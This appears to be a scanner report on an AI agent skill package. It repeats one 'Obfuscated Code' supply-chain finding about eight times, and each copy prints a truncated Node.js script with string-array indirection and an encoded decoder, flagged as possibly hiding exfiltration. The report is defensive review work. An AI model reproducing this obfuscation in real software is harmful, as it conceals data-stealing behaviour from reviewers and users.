_0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var 